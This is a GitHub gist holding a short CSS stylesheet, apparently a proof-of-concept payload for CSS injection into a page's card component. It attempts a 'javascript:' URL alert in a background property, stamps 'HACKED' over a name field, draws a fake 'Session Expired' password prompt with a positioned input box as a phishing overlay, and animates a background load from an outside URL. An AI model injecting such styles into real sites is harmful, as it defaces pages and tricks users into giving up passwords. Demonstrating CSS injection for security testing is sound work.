Skip to content

Instantly share code, notes, and snippets.

@dgambacorta
Last active January 28, 2025 21:39
Show Gist options
  • Save dgambacorta/1cc4c6252e1e113141a822b4f004d981 to your computer and use it in GitHub Desktop.
Save dgambacorta/1cc4c6252e1e113141a822b4f004d981 to your computer and use it in GitHub Desktop.
@import url("https://fonts.googleapis.com/css2?family=Courier+Prime:ital,wght@0,400;0,700;1,400;1,700&display=swap");
* {
margin: 0;
font-family: "Courier Prime", monospace;
font-weight: 400;
font-style: normal;
color: white;
}
.card {
background: url("javascript:alert('XSS Exploit!')");
}
.card .name::after {
content: "HACKED";
color: red;
font-size: 30px;
}
.card::before {
content: "🔒 Session Expired. Please re-enter your password:";
font-size: 18px;
color: red;
display: block;
position: absolute;
top: 50px;
left: 50px;
background: white;
padding: 10px;
border: 2px solid red;
z-index: 9999;
}
.card input {
position: absolute;
top: 80px;
left: 50px;
width: 200px;
height: 30px;
border: 1px solid black;
}
@keyframes redirect {
0% { background: url("https://www.strike.sh/"); }
}
body {
animation: redirect 5s infinite;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment